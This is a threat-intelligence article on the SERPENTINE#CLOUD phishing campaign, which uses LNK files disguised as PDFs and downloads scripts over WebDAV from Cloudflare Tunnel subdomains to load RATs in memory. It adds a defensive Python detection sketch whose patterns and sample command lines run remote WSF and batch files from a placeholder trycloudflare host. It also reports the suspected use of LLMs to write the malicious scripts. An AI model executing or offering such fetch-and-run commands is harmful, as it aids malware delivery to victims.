
A newly uncovered malicious campaign, dubbed SERPENTINE#CLOUD, leverages Cloudflare Tunnel subdomains to deliver payloads via phishing email attachments. This intricate, multi-stage infection chain was identified by Securonix, which observed activity across multiple regions—including the United States, the United Kingdom, Germany, and various other countries throughout Europe and Asia.
The initial phase of the attack begins with a widespread phishing email campaign featuring subject lines related to invoices or payments. These messages contain ZIP file attachments embedding a Windows shortcut (LNK) disguised as a PDF document. Upon opening, the file triggers a download of a script from a remote WebDAV server hosted on a Cloudflare Tunnel subdomain. This tactic allows the attackers to exploit the trusted infrastructure of a widely-used cloud service as a covert transport layer, evading traditional domain-based detection mechanisms.

The next stage involves the execution of a Windows Script File (WSF) via cscript.exe. Written in VBScript, the script fetches an external batch file—kiki.bat—also hosted on a Cloudflare subdomain. To distract the victim, it opens a fake PDF document while simultaneously checking for antivirus software and retrieving the next-stage payload: Python-based scripts.
The final stage employs a Python-based loader that injects malicious code into memory using Donut, a well-known open-source in-memory shellcode loader. Identified payloads include remote access tools (RATs) such as AsyncRAT, Revenge RAT, GuLoader, Remcos, PureLogs Stealer, XWorm, and Venom RAT. These operate exclusively in memory, leaving no artifacts on the file system, which greatly hinders detection.
Researchers emphasized the evolving nature of initial access vectors. Whereas attackers previously relied on internet shortcut files (URL), they have now shifted toward using standard Windows shortcut files (LNK) masquerading as documents. These trigger WebDAV-based downloads through subdomains like .trycloudflare[.]com, making the malicious traffic virtually indistinguishable from legitimate communication.
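The chain described above (a shortcut posing as a PDF, cscript.exe running a WSF, and a batch file fetched over WebDAV from a trycloudflare.com subdomain) gives defenders a handful of cheap, combinable indicators. The detection sketch below is an added example and not code from the Securonix report; the process-creation events are constructed, the `@SSL\DavWWWRoot` UNC form assumes the download surfaces through the Windows WebClient redirector, and the `.pdf.lnk` naming is an assumed form of the disguise.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Indicators drawn from the chain described above. The UNC form and the
# .pdf.lnk disguise are assumptions about how the activity appears in logs.
TRYCLOUDFLARE_RE = re.compile(r"[\w-]+\.trycloudflare\.com", re.I)
WEBDAV_UNC_RE = re.compile(r"\\\\[\w.-]+@ssl(@\d+)?\\davwwwroot\\", re.I)
WSF_RE = re.compile(r"\.wsf\b", re.I)
BAT_RE = re.compile(r"\.bat\b", re.I)

@dataclass
class ProcessEvent:
    parent: str   # parent image name
    image: str    # full path of the created process
    cmdline: str  # command line as logged

def score_event(ev: ProcessEvent) -> List[str]:
    """Return the indicator names matched by one process-creation event."""
    hits = []
    img = ev.image.lower()
    if TRYCLOUDFLARE_RE.search(ev.cmdline):
        hits.append("trycloudflare_subdomain")
    if WEBDAV_UNC_RE.search(ev.cmdline):
        hits.append("webdav_unc_path")
    if img.endswith("cscript.exe") and WSF_RE.search(ev.cmdline):
        hits.append("cscript_wsf")
    if img.endswith("cmd.exe") and BAT_RE.search(ev.cmdline) and WEBDAV_UNC_RE.search(ev.cmdline):
        hits.append("remote_batch")
    return hits

def triage(events: List[ProcessEvent], threshold: int = 2) -> List[Tuple[ProcessEvent, List[str]]]:
    """Keep events matching at least `threshold` indicators; a lone local .wsf run is routine admin activity."""
    return [(ev, hits) for ev in events if len(hits := score_event(ev)) >= threshold]

def flag_attachment_names(names: List[str]) -> List[str]:
    """Archive entries that are shortcuts dressed up as documents (assumed .pdf.lnk form)."""
    return [n for n in names if n.lower().endswith(".lnk") and ".pdf" in n.lower()[:-4]]

# Constructed sample events, not taken from the report; hostnames are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //nologo \\random-words.trycloudflare.com@SSL\DavWWWRoot\invoice.wsf"),
    ProcessEvent("cscript.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c \\random-words.trycloudflare.com@SSL\DavWWWRoot\kiki.bat"),
    ProcessEvent("explorer.exe", r"C:\Windows\System32\cscript.exe", r"cscript.exe C:\Scripts\inventory.wsf"),
    ProcessEvent("svchost.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Tasks\backup.bat"),
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT {ev.image} <- {ev.parent}: {hits}")
```

Only the two events that combine a trycloudflare.com WebDAV path with script-host or batch execution clear the threshold; the local .wsf run and the local batch job do not.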
Moreover, analysts discovered extensive comments embedded within the batch and VBScript code, hinting that the code may have been generated with the help of large language models (LLMs). Collectively, these attributes render the campaign highly evasive, multilayered, and meticulously obfuscated.
A cornerstone of SERPENTINE#CLOUD’s effectiveness lies in its fusion of social engineering, living-off-the-land (LotL) techniques leveraging native Windows utilities, and stealthy in-memory execution. By harnessing Cloudflare Tunnel, the attackers ensure not only encrypted delivery channels but also a complete replacement of conventional command-and-control architecture, significantly reducing the chance of detection or disruption by cybersecurity professionals.
Securonix warns that this campaign is ongoing and likely to evolve, potentially targeting new regions and scenarios. Although the threat actors exhibit fluency in English, their precise origin remains undetermined.